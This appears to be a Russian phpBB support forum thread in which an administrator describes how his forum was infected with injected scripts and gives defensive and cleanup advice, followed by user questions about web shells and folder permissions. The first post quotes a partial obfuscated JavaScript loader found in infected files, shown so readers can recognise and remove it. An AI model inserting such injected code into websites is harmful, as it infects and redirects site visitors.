Полезная информация


----

Начать новую тему Ответить на тему
АвторСообщение

 Сообщение Трояны и phpbb3 
#1 

Аватар пользователя

Всем доброго времени суток. Каждый день ломаю голову, думаю чего бы еще интересного вам рассказать на основе личного опыта. В свете недавнешних событий, решил что можно порассуждать о троянских вирусах (хотя не знаю почему повелось так называть заражение, ведь вроде ПК-ные троянцы тырят личные данные, а сайтовые - врядли). Собственно начнем ....

Многие из вас частенько натыкались в интернете на сайты, которые были поражены вирусами, при посещении которых антивирус начинал истошно вопить. Натыкался на такие и я, думал мол, как так админы допустили это (ну конечно есть определенный процент сайтов, созданных специально для рассады заразы). Думал меня пронесет, все вроде защищено... Ан нет, в истории нашего форума произошло 2 заражения. Первое - очень легкое, заражены были только JS-файлы, а может я вовремя заглянул и закрыл очаг. Второе же, недавнешнее - очень жесткое. Почти 60% файлов были заражены, а это и php-, html-, JS-файлы + перенаправление на какой то трейдерский сайт. Потратив день, сумел все же восстановить форум. Дело это конечно неприятное, но зато получил своеобразный опыт, да и бекап форума сделал наконец то полный :hi_hi_hi:

Так что ребята, никогда не расслабляйтесь, беда может и вас постигнуть.... Давайте подумаем, а чем же можно уберечься от подобных ситуаций ?

1. Пароли к панели хостинга и ФТП
- Это основное и самое больное место всех без исключения. Вам главное понять, что каким бы ни был начальный пароль, данный вам хостером - он рано или поздно будет взломан. Почему ? Да потому, что ни у одного хостера я не видел задержки на безошибочный ввод пароля. Иными словами, если ктото задастся целью ломануть пароль - его ничто не остановит. Пароль можно подбирать бесконечно долго, таймаутов на ввод неправильного пароля нет нигде. Собственно первоочередная ваша задача - смена дефолтных паролей доступа на более сложные, я бы даже рекомендовал делать пароли максимально длинными. Составляйте их таким образом, чтобы логика напрочь отсутствовала, брякните по клаве на 20 знаков пароль с цифрами и буквами. Чем длинней пароль - тем дольше его подбирать, у взломщика может попросту кончиться терпение.

2. Доступы на папки сервера
- Это такая вещь, стоящая на одном уровне с первым пунктом. Возможно даже выше. Тут главное понять что злоумышленникам иногда и не надо подбирать пароли. Если у вас на сервере есть хоть одна папка с открытым доступом (права наверное 777), то вам несдобровать. Банально заливается шелл и в течении пары часов ваш форум заражен. Так что не лепите тысячи папок на ФТП, делайте только нужные и настраивайте к ним нормальные права доступа.

3. Проверенные модификации и скрипты
- Раз уж говорим о наших форумах, то нужно помнить и об этом пункте. Собственно вас могут подкупить красивым названием и описанием мода(скрипта), а уж внутри него будет настоящий троянчик или уязвимость. Так что советую ставить только моды, прошедшие валидацию на оффоруме. Ставить моды, которые вам необходимы, а не потому что у большинства они стоят. Такое же дело и со скриптами. Перед их установкой внимательно читайте описание, комменты, просмотрите код скриптов, если чтото покажется подозрительным - лучше спросить у знающих людей.

4. Частые и полные бекапы форума.
- Способ пассивной защиты, писать особо тут нечего. Логика проста - если вы делаете частые полные бекапы форума, то при заражении файлов, вам потребуется всего лишь заново залить файлики с заменой (ну разумеется пароли поменять от хостинга).

5. Панель вебмастера Гугл
- Этот инструмент весьма полезен. Почему не яндекс ? Потому что яндекс не умеет кое чего. Представим себе такую ситуацию - вам необходимо отлучиться от форума на достаточно большой срок, доступ у вас есть только к почте, а за это время ваш форум все же заразили. Так вот, с задержкой в 5-6 часов вам придет на мыло письмецо от Гугла, мол заражен ваш форум. Очень полезная вещь, ведь никто не знает наверняка когда форум может быть заражен, а так вы получите уведомление и наиболее быстро среагируете на аварию. Собственно, не ленитесь и добавляйте свой форум в панель вебмастера Гугла

Со способами защиты мы ознакомились, теперь подумаем над вашими действиями в том случае если все же получили заражение ....

Раз уж вы читаете данную статью, то наверняка после прочтения добавите наконец то свой форум в Гугл :hi_hi_hi:
Так вот, либо сами замечаете недовольство антивируса на ваш форум либо получаете письмецо от Гугла, тут главное не паниковать, не делать опрометчивых действий. Расслабьтесь и начинайте по пунктам...

1. Отключение форума на уровне хостинга
- Такая функция должна быть у каждого хостера. Тут же вам надо отключить работу вашего домена, дабы прекратить издевательство над пользователями (заодно и возможно остановить процесс распространения заражения). Не бойтесь этого делать, ФТП доступ у вас то будет.

2. Смена паролей
- Очевидное решение - поменяйте пароли всех доступов на хостинг - панель, ФТП, может еще чего. Таким действием отрубим потенциального злоумышленника от файлов.

3. Работа с файлами форума
- Есть актуальный бекап ? Восстанавливаем. Нет ? Скачиваем абсолютно все файлы форума себе на компьютер и через Нотепад ++ смотрим сначала все JS файлы. Они заражаются в первую очередь, потом уж остальные. Смотрим код скриптов на наличие совершенно лишних участков, к примеру у меня был такой код (он разумеется не полный)
<!--ded509--> catch(q){a=1}if(!a){try{document["\x62ody"]^=~1;}catch(q){a2="_"}z="2f_6d_7c_75_6a_7b_70_76_75_27_2f_30_27_82_14_11_27_27_27_27_7d_68_79_27_77_27_
44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_
74__30_42_14_11_14_11_27_27_27_27_77_35_7a_79_6a_27_44_27_2e_6f_7b_7
b_77_41_36_36_6a_68_6a_68_6d_73_7c_77_35_79_7c_36_6a_76_7c_75_7b_38_3e_35_77_6f_77_2e_42_14_11_27_27_27_27_77_35_7a_7
b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68_69_7a_76_73
_7c_7b_6c_2e_42_14_11_27_27_27_27_77
__63_2e_45_43_36_6b_70_7d_45_2e_30_42_14_11_27_27_27_27_27_27_27_27
_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80
_50_6b_2f_2e_77_2e_30_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_77_30_42_
14_11_27_27_27_27_84_14_11_84_30_2f_30_42""split"}</script><!--/ded509-->
 

Ну очень такое бросается в глаза. Плюс, проблема всех таких вставок - код везде абсолютно одинаков. Значит открываем блокнот и идем в поиск по файлам, для начала вбиваем весь кусок вредоносного кода и выбираем опцию удаления найденного. Потом берем выдающуюся часть, у себя я взял ded509 и еще раз вбиваем это в поиск по файлам для успокоения совести (а вдруг все же вставка разная есть). После этого визуально осматриваем папки форума на наличие новых и непонятных папок с файлами, удаляем подозрительное. Потом для чистоты эксперимента сканируем все файлы антивирем и заливаем все обратно на ФТП с обязательной заменой.

4. Завершающий этап
- Активируем работу домена, смотрим на адекватную работу форума, антивирь молчит. Все хорошо, идем в панель хостинга и смотрим лог работ с папками за ближайшие 24 часа. Нам надо выловить момент заражения и понять - ломанули ли пароль иль шелл залили, делаем необходимые выводы. В панели вебмастера Гугла отправляем форум на перепроверку и в течении 24 часов ваш форум полностью разблокируется в Гугле и продолжит свою работу на благо общества :hi_hi_hi:

Впринципе наверное все написал что и хотел. Сами видите, дело одновременно и сложное и простое это. Надеюсь вас не постигнет такая беда, а если что - у вас есть маленькое руководство к действию, можете и мне в личку стукнуть, помогу если будет завал. Всем безоблачной работы ваших форумов :ya_hoo_oo:

ЗЫ. Может у кого есть еще советы? Пишите, не стесняйтесь, составим руководство вместе :ras_pal_cov_ka:


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!

Теги темы
Трояны и phpbb3
          Вернуться наверх  
 

#2 

Аватар пользователя

Японский легче выучить... :-(--
Но тем не менее, спасибо за статью, надо будет сидеть по пунктам разбираться.

У меня несколько вопросов:
1. Что такое шелл?
2. Как ты обнаружил заражение, откуда оно пришло?
3. Чтобы не проделывать все описанные операции, существует ли один какой-то способ,? Например, сканер, который ежедневно отслеживает изменения? )если делать ежедневный бэкап, то отследить будет проще?)


_________________
Подпись:
Я уже прошел тот период когда можно было забывать про очистку кеша ©salexcorp

Информация о редактировании
Последний раз редактировалось Lorem Ipsum 07 май 2013, 04:38, всего редактировалось 1 раз.
          Вернуться наверх  
 

#3 

Аватар пользователя

1. Обычно под шеллом подразумевают скрипт, который взломщики загружают на сервер и с его помощью осуществляется дальнейшее управление сервером. Шелл это своеобразная графическая оболочка, которая позволит управлять файлами сервера
2. Я так и не понял, логи были утрачены, поздно спохватился. Как обнаружил - просто зашел на форум,а меня перекинуло на другой сайт
3. Ну бекапы делать надо в любом случае, а так в качестве профилактики - менять пароли каждый месяц хотя бы от сервера


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 

#4 

Аватар пользователя

DeaDRoMeO писал(а):

под шеллом подразумевают скрипт, который взломщики загружают на сервер и с его помощью осуществляется дальнейшее управление сервером.

Злодеи могут загрузить этот скипт, только если узнают или взломают пароль от сервера? Или существуют ещё какие-то возможности?


_________________
Подпись:
Я уже прошел тот период когда можно было забывать про очистку кеша ©salexcorp
          Вернуться наверх  
 

#5 

Аватар пользователя

Если знают пароль - стопроцентно, я еще грешу на права на папки сервера, надо будет самому потестировать у себя)


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 

#6 

Аватар пользователя

DeaDRoMeO писал(а):

Если у вас на сервере есть хоть одна папка с открытым доступом (права наверное 777)

Сергей! Ткните в тему где есть информация, как изменить права если они 777 или другие которые нужно исправить. А главное как это выяснить и исправить! Прочитал тему. Растроился, задумался, испугался. Позже поменяю все нужные пароли на 20-ти значные, а вот как защитить папки с открытым доступом, как узнать есть ли они у меня и что где изменить чтоб они были гарантированно защещены,не знаю!
Опять же, Спасибо!!


          Вернуться наверх  
 

#7 

Аватар пользователя

Олег В писал(а):

а вот как защитить папки с открытым доступом

Через браузер пробуем получить доступ к папке, допустим есть папочка c любым именем и правами 777, переходим по адресу
http://адрес форума/имя папки/
 

Если в результате в браузере открывается содержимое папки - это печально
Олег В писал(а):

как узнать есть ли они у меня

Ну тут вручную надо проверять права на папки, через тотал коммандер к примеру


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 

#8 

Аватар пользователя

Проверил свои папки на сервере. Попытка зайти во многие из них выводит ошибку 403 и переводит на хостинг, но некоторые папки не выдают ни каких ошибок. Просто чистый экран в браузере. Так и должно быть или где то сидит скрытая угроза??


          Вернуться наверх  
 

#9 

Аватар пользователя

Олег В писал(а):

но некоторые папки не выдают ни каких ошибок. Просто чистый экран в браузере.

А какие на них права стоят ?


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 


Аватар пользователя

Lorem Ipsum писал(а):

Чтобы не проделывать все описанные операции, существует ли один какой-то способ,? Например, сканер, который ежедневно отслеживает изменения?
Надо зарегистрировать свой форум на сайте
Пожалуйста Зарегистрируйтесь чтобы увидеть ссылку
. Они периодически сканируют, и если обнаруживают что-то новое и подозрительное, присылают имейл. Вон недавно Сергей добавил какой-то скриптик, и мне намейл тут-же пришло:

SiteGuard.ru информирует: появились новые коды на сайте forum.north-ameri.ca.
Подробности: http://www.siteguard.ru/p23.html
 

Если известно, что это за скрипт, то в таблице на этом сайте возле него надо нажать кнопочку, тем самым давая понять, что это не какая-то кака, и сканер будет игнорировать этот скрипт при последующих сканах.

Кроме того, можно поставить кнопочку этого сайта (как у меня на форуме в самом низу), которая будет информировать посетителей, что форум защищён сайтгардом.


          Вернуться наверх  
 


Аватар пользователя

ursego, Спасибо за ссылку. Зарегился и проверился. Система сообщает о трёх подозрительных Javascript/IFrame.
Удалить их или добавить в доверенные, кто что посоветует??
Пожалуйста Зарегистрируйтесь чтобы увидеть ссылку


          Вернуться наверх  
 


Аватар пользователя

[s]Всё! Это конец! Табун троянских коней захватил форум![/s] Эти нормальные.


          Вернуться наверх  
 


Аватар пользователя

DeaDRoMeO писал(а):

А какие на них права стоят ?

На всех папках выставленны вот такие такие атрибуты.
Пожалуйста Зарегистрируйтесь чтобы увидеть ссылку


          Вернуться наверх  
 


Аватар пользователя

Блин... вот зачем читала такие страсти! теперь буду переживать и боятся )))

Цитата:
Если у вас на сервере есть хоть одна папка с открытым доступом (права наверное 777), то вам несдобровать

ни на одной папке не должно быть таких прав??? Файлов это тоже касается?

Цитата:
Частые и полные бекапы форума

есть на ХВ темка где прям описано - как делать ПОЛНЫЕ бекапы?


          Вернуться наверх  
 


Аватар пользователя

Олег В, атрибуты правильны
Лена писал(а):

как делать ПОЛНЫЕ бекапы?

Да, правда инструкция в теме о том, как развернуть форум у себя на компе - viewtopic.php?f=82&t=588
Лена писал(а):

ни на одной папке не должно быть таких прав??? Файлов это тоже касается?

Обычно такие папки защищаются хостингом от стороннего вмешательства, если найдете такую папку с правами 777 то проверьте, возможно ли с браузера попасть в эту папку


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 


Аватар пользователя

Лена писал(а):

если найдете такую папку с правами 777 то проверьте, возможно ли с браузера попасть в эту папку

если не попадаю, то так и оставить 777 ? а если править, то на что? 775 хотя бы?


          Вернуться наверх  
 


Аватар пользователя

Папка форумная или сами ее создавали ?


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 


Аватар пользователя

А есть разница?
В общем на папках cache, files, store и карта сайта стоят права 777. Убрать на 775???


          Вернуться наверх  
 


Аватар пользователя

Лена писал(а):

В общем на папках cache, files, store и карта сайта стоят права 777.

Так того требуют разрабы, лучше не трогать


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 


Аватар пользователя

Т.е. через эти папки ничего серьезного нельзя взломать? Через браузер они вроде не открываются, хотя права 777 стоят....


          Вернуться наверх  
 
 
Начать новую тему Ответить на тему


Дополнительные возможности

  Похожие темы  Автор  Ответов  Просмотров  Последнее сообщение 
Аватар пользователя SQL ERROR phpbb3
В данной теме я буду рассматривать всевозможные ошибки Базы Данных и пути решения проблем

DeaDRoMeO

0

435

Аватар пользователя

08 окт 2011, 18:51

DeaDRoMeO

Аватар пользователя Сео-оптимизация phpbb3
Статья посвящена небольшой сео-оптимизации форума, эти правки нужно выполнить всем админам, заботящимся о хорошей выдаче

DeaDRoMeO

365

28224

Аватар пользователя

17 ноя 2017, 22:23

madam-ka

Аватар пользователя NV who was here phpbb3 ? - Кто был на форуме ?
NV who was here phpbb3 ? - модификация добавляет на форум phpbb3 новый информационный блок, содержащий в себе полный список тех, кто был на форуме за день

DeaDRoMeO

52

7381

Аватар пользователя

05 фев 2015, 16:13

DeaDRoMeO

Аватар пользователя BB3Topics phpbb3
BB3Topics - модификация для phpbb3, добавляющая блок на главную страницу форума со следущим содержимым - Новые темы, Последние обьявления, Популярные темы, Обсуждаемые темы, Случайные темы, Темы с опросами

DeaDRoMeO

96

10400

Аватар пользователя

05 мар 2017, 18:36

DeaDRoMeO

Аватар пользователя Who Views Who phpbb3
Who Views Who - модификация для phpbb3, которая немного расширит информацию предоставляемую на странице Кто Онлайн

DeaDRoMeO

8

2552

Аватар пользователя

30 сен 2013, 20:27

DeaDRoMeO

Оставить свой комментарий

Поделиться темой с помощью

Ссылки на тему

Прямая ссылка:
BB-код для форумов, сайтов, блогов:
HTML ссылка:
 


cron

Самая неформальная поддержка phpBB :P